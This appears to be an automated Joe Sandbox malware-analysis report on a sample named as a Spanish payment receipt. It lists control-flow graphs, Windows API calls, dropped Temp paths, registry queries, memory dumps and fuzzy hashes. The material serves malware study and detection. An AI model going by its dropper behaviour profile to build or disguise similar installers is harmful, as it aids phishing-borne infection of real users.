                                                                                                                                                                                    control_flow_graph 721 406026-406032 722 406033-406067 GetTickCount GetTempFileNameW 721->722 723 406076-406078 722->723 724 406069-40606b 722->724 725 406070-406073 723->725 724->722 726 40606d 724->726 726->725
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00406044
                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                    • API String ID: 1716503409-678247507
                                                                                                                                                                                    • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                    • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                                                                                                                                                                                    Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 810 4015c1-4015d5 call 402da6 call 405e81 815 401631-401634 810->815 816 4015d7-4015ea call 405e03 810->816 818 401663-4022f6 call 401423 815->818 819 401636-401655 call 401423 call 406507 SetCurrentDirectoryW 815->819 824 401604-401607 call 405ab5 816->824 825 4015ec-4015ef 816->825 834 402c2a-402c39 818->834 835 40292e-402935 818->835 819->834 837 40165b-40165e 819->837 833 40160c-40160e 824->833 825->824 830 4015f1-4015f8 call 405ad2 825->830 830->824 841 4015fa-4015fd call 405a38 830->841 839 401610-401615 833->839 840 401627-40162f 833->840 835->834 837->834 843 401624 839->843 844 401617-401622 GetFileAttributesW 839->844 840->815 840->816 846 401602 841->846 843->840 844->840 844->843 846->833
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                                                                                                                                                      • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                                                                                                                                                      • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                      • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes, xrefs: 00401640
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes
                                                                                                                                                                                    • API String ID: 1892508949-2682595351
                                                                                                                                                                                    • Opcode ID: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
                                                                                                                                                                                    • Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
                                                                                                                                                                                    • Opcode Fuzzy Hash: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
                                                                                                                                                                                    Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040663C,80000002), ref: 0040641B
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 00406426
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                    • String ID: : Completed
                                                                                                                                                                                    • API String ID: 3356406503-2954849223
                                                                                                                                                                                    • Opcode ID: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
                                                                                                                                                                                    • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                                                                                                                                                                                    Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                                                                                                                                                    • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                                                                                                                                                                                    • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                                                                                                                                                                                    Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                                                                                                                                                    • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                                                                                                                                                                                    Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                                                                                                                                                    • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                                                                                                                                                    • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                                                                                                                                                                                    Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                                                                                                                                                    • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                                                                                                                                                                                    • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                                                                                                                                                                                    Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                                                                                                                                                    • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                                                                                                                                                    • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
                                                                                                                                                                                    Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                                                                                                                                                    • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                                                                                                                                                                                    Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                                                                                                                                                    • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                                                                                                                                                    • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                                                                                                                                                                                    Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                                      • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                                      • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                                      • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                                      • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
